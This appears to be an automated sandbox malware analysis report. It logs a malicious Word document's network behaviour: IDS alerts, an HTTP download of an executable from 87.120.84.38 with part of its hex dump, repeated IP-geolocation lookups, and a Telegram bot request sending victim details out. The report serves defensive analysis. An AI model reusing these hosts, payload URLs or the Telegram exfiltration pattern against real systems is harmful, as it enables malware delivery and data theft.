Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 87.120.84.38:80 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 87.120.84.38:80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 87.120.84.38:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 87.120.84.38:80 -> 192.168.2.22:49163
Source: Network traffic Suricata IDS: 2827449 - Severity 1 - ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123) : 87.120.84.38:80 -> 192.168.2.22:49163
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:25:03 GMTContent-Type: application/x-msdos-programContent-Length: 755712Connection: keep-aliveLast-Modified: Wed, 30 Oct 2024 01:58:38 GMTETag: "b8800-625a80a540932"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 91 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6c 0b 00 00 1a 00 00 00 00 00 00 a2 8a 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 8a 0b 00 4f 00 00 00 00 a0 0b 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 6a 0b 00 00 20 00 00 00 6c 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 17 00 00 00 a0 0b 00 00 18 00 00 00 6e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 86 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 8a 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 71 00 00 c4 67 00 00 03 00 00 00 81 00 00 06 d0 d8 00 00 80 b1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 12 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 28 17 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 13 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 28 18 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 14 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 28 19 00 00 0a 0a 2b 00 06 2a 13 30 04 00 15 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 28 1a 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 05 00 17 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 28 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 06 00 19 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 1c 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 02 00 19 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 28 1d 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 1a 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 28 1e 00 00 0a 0a 2b 00 06 2a 00 00 13 30 04 00 1b 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: SHARCOM-ASBG SHARCOM-ASBG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
May check the online IP address of the machine
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe DNS query: name: reallyfreegeoip.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49164 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49167 -> 193.122.6.168:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49172 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49170 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49166 -> 188.114.96.3:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: unknown TCP traffic detected without corresponding DNS query: 87.120.84.38
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B82D526-DA5E-48B6-9927-FFCE89E887B8}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20and%20Time:%2010/31/2024%20/%204:16:24%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20128757%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /txt/pKL9HXcZosWfPt1.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
